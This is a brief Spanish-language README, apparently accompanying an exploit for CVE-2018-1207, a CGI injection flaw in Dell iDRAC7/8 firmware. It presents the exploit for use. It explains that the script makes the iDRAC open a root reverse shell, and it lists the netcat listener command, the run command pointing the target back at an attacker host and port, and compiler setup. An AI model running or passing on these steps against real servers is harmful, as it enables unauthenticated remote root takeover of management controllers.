
Explotar iDRAC 7 y 8 firmware < 2.52.52.52
Exploit para firmware iDRAC 7 y 8 < 2.52.52.52
Dell EMC iDRAC7/iDRAC8, versiones anteriores a 2.52.52.52, contienen una vulnerabilidad de inyección CGI que podría usarse para ejecutar código remoto. Un atacante remoto no autenticado podría potencialmente usar variables CGI para ejecutar código remoto.
Este código debería hacer que el servicio iDRAC abra una reverse shell como usuario root.
Inicia tu listener local: nc -v -l -p local_port
nc -v -l -p 5500
Ejecuta el exploit: python ./cve-2018-1207.py remote_host remote_port local_host local_port
python ./cve-2018-1207.py 192.168.1.10 443 192.168.1.200 5500
Necesitas tener instalada una versión de sh4-linux-gnu-gcc, que actualmente es sh4-linux-gnu-gcc-11
Puedes instalarlo con apt install gcc-11-sh4-linux-gnu